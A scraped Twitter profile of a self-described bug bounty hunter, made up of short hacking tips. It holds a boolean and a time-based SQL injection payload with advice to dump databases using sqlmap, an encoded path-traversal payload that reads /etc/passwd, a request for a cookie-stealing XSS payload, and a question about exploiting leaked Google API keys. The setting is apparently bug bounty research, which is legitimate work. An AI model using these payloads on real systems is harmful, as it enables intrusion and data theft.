Mohamed Ibrahim
@mOhamedd7w
Security_Researcher/Bug_Bounty_Hunter
ID:1366684643785867273
02-03-2021 09:40:12
194 Tweets
1,0K Followers
491 Following
SQLi..
1. original parameter --> content-length:9230
2. inject: and 1=1 # --> content-length:9230
3. inject: and 1=2 # --> content-length:4766
4. Now, sqlmap turn --> Dump the whole databases
#bugbounty tip #bugbounty #Pentesting
IDOR in Bug bounty program but unfortunately duplicate
#bugbounty #penetrationtesting #report #Bugcrowed #hackerone
#hacking #security #ethicalhacking #informationsecurity #cyber #bughunting #infosec #cyber attack #cyber security
Hi Amazing Hackers ..
I need xss payload to steal victim cookies..
The payload should not have backslash '/' .
#bugbountytip #BugBounty #Security #hackerone #bugcrowd
LFI On Fire .❤️
found interesting param using gf tool --> send request to Intruder --> using LFI-Jhaddix wordlist -->Got LFI
Payload used: %2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
#bugbounty tips #bugbounty #bugcrowd #hackerone #security
Hi amazing hackers:
I have found (Client ID) and (API key) and (INCIDENT FOLDER ID) and (INCIDENT TEMPLATE ID) from the Google Developer Console...
Need away for Exploitation ...
#bugbountytips #BugBounty #infosecurity #security #Pentesting #PenTest
SQLI confirmed with this payload:
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
Now, let sqlmap do it ...👇
#bugbounty #bugbounty tips #hackerone #bugcrowd
Check out My new Writeup (How I was Able To Bypass The Admin Panel)
medium.com/@mohameddiv77/…
#bugbountytips #BugBounty